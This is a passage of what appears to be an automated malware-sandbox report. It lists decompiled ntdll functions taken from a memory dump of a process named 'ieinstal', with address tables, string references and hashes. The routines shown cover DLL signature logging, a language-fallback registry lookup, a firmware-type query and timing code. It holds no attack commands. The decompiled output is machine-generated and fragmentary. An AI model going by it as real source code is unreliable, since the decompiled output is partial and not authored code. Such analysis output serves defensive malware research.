									E1ECD7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E1EC77D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1EC77D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E1ECD7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E1EC8A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E1EC5B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                            0x1ec67e4c
                                                            0x1ec67e50
                                                            0x1ec67e55
                                                            0x1ec67e58
                                                            0x1ec67e5d
                                                            0x1ec67e71
                                                            0x1ec67f33
                                                            0x1ec67e77
                                                            0x1ec67e77
                                                            0x1ec67e79
                                                            0x1ec67e79
                                                            0x1ec67e7e
                                                            0x1ec67f45
                                                            0x1ecb9848
                                                            0x00000000
                                                            0x1ecb9848
                                                            0x1ec67f4e
                                                            0x1ec67f53
                                                            0x1ec67f5a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb985a
                                                            0x1ecb9862
                                                            0x1ecb9866
                                                            0x00000000
                                                            0x1ecb986c
                                                            0x00000000
                                                            0x1ecb986c
                                                            0x1ec67e84
                                                            0x1ec67e84
                                                            0x1ec67e8d
                                                            0x1ecb9871
                                                            0x1ec67eb8
                                                            0x1ec67ec0
                                                            0x1ec67ec0
                                                            0x1ec67e9a
                                                            0x1ecb987e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb9884
                                                            0x1ecb988b
                                                            0x1ecb98a7
                                                            0x1ecb98ac
                                                            0x1ecb98b1
                                                            0x1ecb98b6
                                                            0x1ecb98b8
                                                            0x1ecb98b8
                                                            0x1ecb98b9
                                                            0x00000000
                                                            0x1ecb98b9
                                                            0x1ec67ea0
                                                            0x1ec67ea7
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec67eac
                                                            0x1ec67eb1
                                                            0x1ec67ec6
                                                            0x1ec67ed0
                                                            0x1ecb98cc
                                                            0x1ec67ed6
                                                            0x1ec67ed6
                                                            0x1ec67ed6
                                                            0x1ec67ede
                                                            0x1ec67ee3
                                                            0x1ecb98e3
                                                            0x1ecb98f0
                                                            0x1ecb9902
                                                            0x1ecb98f2
                                                            0x1ecb98fb
                                                            0x1ecb98fb
                                                            0x1ecb9907
                                                            0x1ecb991d
                                                            0x1ecb991d
                                                            0x1ecb9907
                                                            0x1ecb98e3
                                                            0x1ec67ef0
                                                            0x1ec67f14
                                                            0x1ec67f14
                                                            0x1ec67f1e
                                                            0x1ecb9946
                                                            0x1ec67f24
                                                            0x1ec67f24
                                                            0x1ec67f24
                                                            0x1ec67f2c
                                                            0x1ecb996a
                                                            0x1ecb9975
                                                            0x1ecb9975
                                                            0x1ecb997e
                                                            0x1ecb9993
                                                            0x1ecb9993
                                                            0x1ecb997e
                                                            0x00000000
                                                            0x1ec67ef2
                                                            0x1ec67efc
                                                            0x1ec67f0a
                                                            0x1ec67f0e
                                                            0x1ecb9933
                                                            0x00000000
                                                            0x1ecb9933
                                                            0x00000000
                                                            0x1ec67f0e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec67eb1

                                                            Strings
                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 1ECB9891
                                                            • LdrpCompleteMapModule, xrefs: 1ECB9898
                                                            • minkernel\ntdll\ldrmap.c, xrefs: 1ECB98A2
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                            • API String ID: 0-1676968949
                                                            • Opcode ID: 714be3d55a2fca0dc4716102f327ac5b5dbdf9fc78f391caffdf0f4cbbd9312e
                                                            • Instruction ID: 0e66bb6d5444954b12ef4a10bf66aa15e2cf92c69b976a2538aea5a569ac45f5
                                                            • Opcode Fuzzy Hash: 714be3d55a2fca0dc4716102f327ac5b5dbdf9fc78f391caffdf0f4cbbd9312e
                                                            • Instruction Fuzzy Hash: 3D511F32A007869FD711CB69CD80B9B7BE5AF08750F140BA9E8519B7E5EB30ED04CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E1EC5E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E1EC5F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1EC995D0();
						}
						if(_t78 != 0) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E1EC9FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E1EC9BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E1EC99600();
					if(_t97 < 0) {
						goto L6;
					}
					E1EC9BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L1EC5F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E1EC9BB40(_t83, _t102 + 0x24, _t78);
								if(L1EC643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E1EC9BB40(_t84, _t102 + 0x24, _t94);
									if(L1EC643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                            0x1ec5e620
                                                            0x1ec5e628
                                                            0x1ec5e62f
                                                            0x1ec5e631
                                                            0x1ec5e635
                                                            0x1ec5e637
                                                            0x1ec5e63e
                                                            0x1ecb5503
                                                            0x1ecb5503
                                                            0x1ec5e64c
                                                            0x1ec5e64c
                                                            0x1ec5e651
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec5e661
                                                            0x1ec5e665
                                                            0x1ecb542a
                                                            0x1ec5e715
                                                            0x1ec5e71a
                                                            0x1ec5e71c
                                                            0x1ec5e720
                                                            0x1ec5e720
                                                            0x1ec5e727
                                                            0x1ec5e736
                                                            0x1ec5e736
                                                            0x1ec5e743
                                                            0x1ec5e743
                                                            0x1ec5e673
                                                            0x1ec5e678
                                                            0x1ec5e67d
                                                            0x1ec5e682
                                                            0x1ec5e685
                                                            0x1ec5e692
                                                            0x1ec5e69b
                                                            0x1ec5e6a3
                                                            0x1ec5e6ad
                                                            0x1ec5e6b1
                                                            0x1ec5e6b2
                                                            0x1ec5e6bb
                                                            0x1ec5e6bf
                                                            0x1ec5e6c0
                                                            0x1ec5e6c8
                                                            0x1ec5e6cc
                                                            0x1ec5e6d5
                                                            0x1ec5e6d9
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec5e6e5
                                                            0x1ec5e6ea
                                                            0x1ec5e6f9
                                                            0x1ec5e70b
                                                            0x1ec5e70f
                                                            0x1ecb5439
                                                            0x1ecb545e
                                                            0x1ecb545e
                                                            0x00000000
                                                            0x1ecb545e
                                                            0x1ecb543b
                                                            0x1ecb543e
                                                            0x1ecb5440
                                                            0x1ecb5445
                                                            0x1ecb5472
                                                            0x1ecb5475
                                                            0x1ecb548d
                                                            0x1ecb5493
                                                            0x1ecb54a9
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb54ab
                                                            0x1ecb54b4
                                                            0x1ecb54bc
                                                            0x1ecb54c8
                                                            0x1ecb54de
                                                            0x1ecb54fb
                                                            0x1ecb54e0
                                                            0x1ecb54e6
                                                            0x1ecb54eb
                                                            0x1ecb54eb
                                                            0x1ecb54de
                                                            0x00000000
                                                            0x1ecb54bc
                                                            0x1ecb5477
                                                            0x1ecb547a
                                                            0x1ecb5480
                                                            0x1ecb5483
                                                            0x1ecb5486
                                                            0x1ecb548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb5447
                                                            0x1ecb5447
                                                            0x1ecb5447
                                                            0x1ecb5447
                                                            0x1ecb544e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb5450
                                                            0x1ecb5452
                                                            0x1ecb5455
                                                            0x1ecb545a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb545c
                                                            0x1ecb546a
                                                            0x1ecb546d
                                                            0x1ecb546f
                                                            0x00000000
                                                            0x1ecb546f
                                                            0x1ec5e70f

                                                            Strings
                                                            • InstallLanguageFallback, xrefs: 1EC5E6DB
                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1EC5E68C
                                                            • @, xrefs: 1EC5E6C0
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                            • API String ID: 0-1757540487
                                                            • Opcode ID: a3125837b4bb8018d0fdec90991f37afcc107ff7b04d1b9a53e4024dd0b79fce
                                                            • Instruction ID: 2573a267a10e12431ffb78b967f6161e3588869376c53c5b362d0c2507360603
                                                            • Opcode Fuzzy Hash: a3125837b4bb8018d0fdec90991f37afcc107ff7b04d1b9a53e4024dd0b79fce
                                                            • Instruction Fuzzy Hash: DB51B3765043869BC704CF25CC50AABB3EABF98655F010A2EF985D7344FB34D904CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E1ECD51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1ed305f0);
				E1ECAD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E1EC6EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E1ECD53CA(0);
						return E1ECAD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E1EC9F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E1EC73690(1, _t117, 0x1ec31810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E1EC9AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L1EC74620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E1EC9AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E1ECD500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E1EC99860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                            0x1ecd51be
                                                            0x1ecd51c3
                                                            0x1ecd51c8
                                                            0x1ecd51cd
                                                            0x1ecd51d0
                                                            0x1ecd51d3
                                                            0x1ecd51d8
                                                            0x1ecd51db
                                                            0x1ecd51de
                                                            0x1ecd51e0
                                                            0x1ecd51e3
                                                            0x1ecd51e6
                                                            0x1ecd51e8
                                                            0x1ecd5342
                                                            0x1ecd5351
                                                            0x1ecd5356
                                                            0x1ecd535a
                                                            0x1ecd5360
                                                            0x1ecd5363
                                                            0x1ecd5366
                                                            0x1ecd5369
                                                            0x1ecd5369
                                                            0x1ecd536b
                                                            0x1ecd536b
                                                            0x1ecd5370
                                                            0x1ecd53a3
                                                            0x1ecd53a4
                                                            0x1ecd53a6
                                                            0x1ecd53ab
                                                            0x1ecd53ab
                                                            0x1ecd53ae
                                                            0x1ecd53ae
                                                            0x1ecd53b5
                                                            0x1ecd53bf
                                                            0x1ecd53bf
                                                            0x1ecd5375
                                                            0x1ecd5396
                                                            0x1ecd53a0
                                                            0x1ecd53a0
                                                            0x00000000
                                                            0x1ecd5396
                                                            0x1ecd5377
                                                            0x1ecd5379
                                                            0x1ecd537f
                                                            0x1ecd538c
                                                            0x1ecd5390
                                                            0x00000000
                                                            0x1ecd5390
                                                            0x1ecd51ee
                                                            0x1ecd51f1
                                                            0x1ecd5301
                                                            0x1ecd5310
                                                            0x1ecd5315
                                                            0x1ecd5318
                                                            0x1ecd531b
                                                            0x1ecd5320
                                                            0x1ecd532e
                                                            0x1ecd5331
                                                            0x00000000
                                                            0x1ecd5331
                                                            0x1ecd5328
                                                            0x1ecd5329
                                                            0x00000000
                                                            0x1ecd5329
                                                            0x1ecd51fa
                                                            0x1ecd5235
                                                            0x1ecd5236
                                                            0x1ecd5239
                                                            0x1ecd523f
                                                            0x1ecd5240
                                                            0x1ecd5241
                                                            0x1ecd5242
                                                            0x1ecd5246
                                                            0x1ecd5247
                                                            0x1ecd524e
                                                            0x1ecd5251
                                                            0x1ecd5267
                                                            0x1ecd5269
                                                            0x1ecd526e
                                                            0x1ecd527d
                                                            0x1ecd527e
                                                            0x1ecd5281
                                                            0x1ecd5282
                                                            0x1ecd5287
                                                            0x1ecd5288
                                                            0x1ecd528a
                                                            0x1ecd528f
                                                            0x1ecd5294
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd529a
                                                            0x1ecd529c
                                                            0x1ecd529e
                                                            0x1ecd529e
                                                            0x1ecd52a4
                                                            0x1ecd52b0
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd52ba
                                                            0x1ecd52bc
                                                            0x1ecd52bc
                                                            0x1ecd52d4
                                                            0x1ecd52d9
                                                            0x1ecd52dc
                                                            0x1ecd52e1
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd52e7
                                                            0x1ecd52f4
                                                            0x00000000
                                                            0x1ecd52f4
                                                            0x1ecd5270
                                                            0x00000000
                                                            0x1ecd5270
                                                            0x1ecd51fc
                                                            0x1ecd51fd
                                                            0x1ecd5202
                                                            0x1ecd5203
                                                            0x1ecd5205
                                                            0x1ecd520a
                                                            0x1ecd520f
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd521b
                                                            0x1ecd5226
                                                            0x1ecd522b
                                                            0x1ecd521d
                                                            0x1ecd521d
                                                            0x1ecd5222
                                                            0x1ecd5222
                                                            0x1ecd522d
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: b971ba9846723994588598439c806422b354683eb69696588249b27071cde558
                                                            • Instruction ID: 7dc7120d73eb804cd0b9c39540c41298edc5a787d9114d991c782b69b427e258
                                                            • Opcode Fuzzy Hash: b971ba9846723994588598439c806422b354683eb69696588249b27071cde558
                                                            • Instruction Fuzzy Hash: 09516C75D00749DFDB14CFA98C90AAEBBB5FF58700F10462DE609EB251DB72A944CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E1EC7B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1ed4d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E1EC77D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E1ED28CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E1EC99E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E1EC9B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E1EC9CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E1EC77D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E1ED28F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E1EC9AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1ed48628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1ed4862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1ed48628; // 0x0
							_t116 =  *0x1ed4862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                            0x1ec7b94c
                                                            0x1ec7b956
                                                            0x1ec7b95c
                                                            0x1ec7b95e
                                                            0x1ec7b964
                                                            0x1ec7b969
                                                            0x1ec7b96d
                                                            0x1ec7b96d
                                                            0x1ec7b970
                                                            0x1ec7b974
                                                            0x1ec7b97a
                                                            0x1ec7badf
                                                            0x1ec7badf
                                                            0x1ec7bae2
                                                            0x1ec7bae4
                                                            0x1ec7bae6
                                                            0x1ec7baf0
                                                            0x1ecc2cb8
                                                            0x1ec7baf6
                                                            0x1ec7baf6
                                                            0x1ec7baf6
                                                            0x1ec7bafd
                                                            0x1ec7bb1f
                                                            0x1ec7bb1f
                                                            0x1ec7baff
                                                            0x1ec7bb00
                                                            0x1ec7bb00
                                                            0x1ec7bb03
                                                            0x1ec7bb03
                                                            0x1ec7bacb
                                                            0x1ec7bacf
                                                            0x1ec7bad0
                                                            0x1ec7bad1
                                                            0x1ec7badc
                                                            0x1ec7badc
                                                            0x1ec7b980
                                                            0x1ec7b980
                                                            0x1ec7b988
                                                            0x1ec7b98b
                                                            0x1ec7b98d
                                                            0x1ec7b990
                                                            0x1ec7b993
                                                            0x1ec7b999
                                                            0x1ec7b99b
                                                            0x1ec7b9a1
                                                            0x1ec7b9a5
                                                            0x1ec7b9aa
                                                            0x1ec7b9b0
                                                            0x1ec7b9bb
                                                            0x1ec7b9c0
                                                            0x1ec7b9c3
                                                            0x1ec7b9ca
                                                            0x1ec7b9cc
                                                            0x1ec7b9cf
                                                            0x1ec7b9d3
                                                            0x1ec7b9d7
                                                            0x1ec7ba94
                                                            0x1ec7ba94
                                                            0x1ec7ba98
                                                            0x1ec7baa3
                                                            0x1ecc2ccb
                                                            0x1ec7baa9
                                                            0x1ec7baa9
                                                            0x1ec7baa9
                                                            0x1ec7bab1
                                                            0x1ecc2cd5
                                                            0x1ecc2cdd
                                                            0x1ecc2cdd
                                                            0x1ec7babb
                                                            0x1ec7babc
                                                            0x1ec7bac2
